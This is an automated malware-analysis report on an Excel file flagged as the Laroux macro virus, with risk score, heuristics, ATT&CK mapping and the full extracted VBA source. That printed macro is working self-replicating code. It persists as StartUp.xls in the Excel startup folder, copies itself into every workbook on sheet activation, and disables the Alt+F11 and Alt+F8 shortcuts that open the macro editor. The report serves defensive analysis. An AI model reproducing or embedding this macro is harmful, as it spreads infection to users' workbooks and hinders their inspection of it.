MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains VBA macros, including an Auto_Open subroutine, which is a common technique for executing malicious code upon opening. The script attempts to copy itself to the Excel startup directory as 'StartUp.xls' to achieve persistence. The document body contains financial data tables, likely a lure to disguise the malicious macro.
Heuristics 3
-
ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 945 bytes |
SHA-256: e6a1b81a4a548e8f5cc6a7b0474d869c6f895739d5cb3b202f7eb790f51fd80c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = True
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
'Workbooks(n$).Close (true)
End If
Application.OnSheetActivate = "StartUp.xls!ycop"
Application.EnableEvents = True
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub ycop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = True
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.